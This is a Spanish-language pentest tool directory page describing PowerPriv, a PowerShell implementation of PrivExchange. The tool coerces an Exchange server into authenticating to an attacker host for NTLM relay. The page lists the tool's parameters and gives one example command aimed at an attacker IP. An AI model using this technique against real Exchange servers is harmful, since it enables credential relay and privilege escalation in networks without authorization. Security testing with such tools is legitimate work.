Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PowerPriv — Una implementación en Powershell de PrivExchange diseñada para ejecutarse bajo el contexto del usuario actual. | Kitploit
Herramientas/GitHubGitHub/g0ldengunsec/powerpriv
Escalada de PrivilegiosExplotaciónMovimiento LateralPruebas de PenetraciónAutenticación
GitHubg0ldengunsec/powerpriv

PowerPriv

Una implementación en Powershell de PrivExchange diseñada para ejecutarse bajo el contexto del usuario actual.

Ver Repositorio
125243hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PowerPriv

DESCRIPCIÓN

Una implementación en PowerShell de PrivExchange por @_dirkjan (código original aquí: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Útil para entornos en los que no se pueden ejecutar aplicaciones basadas en Python, se tienen credenciales de usuario o no se desea dejar archivos en disco. Hará que la cuenta del sistema del servidor Exchange objetivo intente autenticarse en un sistema de su elección.

-targetHost

Nombre de host o IP del servidor Exchange objetivo. Según la configuración de DNS, puede requerir FQDN si se usa el nombre de host. (Requerido)

-attackerHost

Nombre de host o IP de un sistema que usted controla, y en el que idealmente está ejecutando ntlmrelayx. Le estamos diciendo al servidor Exchange que intente autenticarse en este sistema. Según la configuración de DNS, puede requerir FQDN si se usa el nombre de host. (Requerido)

-exchangePort

Puerto para intentar conectarse al servidor Exchange. El valor predeterminado es 443.

-attackerPort

Puerto al que Exchange debe intentar conectarse de vuelta al atacante. El valor predeterminado es 80

-attackerPage

Página a la que le decimos al servidor Exchange que se conecte en nuestro sistema de ataque. No se requieren barras. El valor predeterminado es powerPriv.

-noSSL

Establézcalo en true si no desea usar https para conectarse inicialmente al servidor Exchange. El valor predeterminado es false (usar https).

-Version

Versión del servidor Exchange que estamos atacando. El valor predeterminado es 2013.

EJEMPLO

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

NOTAS

root@kitploit:~
Autor: @g0ldenGunSec  - Basado en la herramienta creada por @_dirkjan
Use esta herramienta únicamente en redes de su propiedad o en las que tenga permiso para realizar pruebas.
Descargar herramienta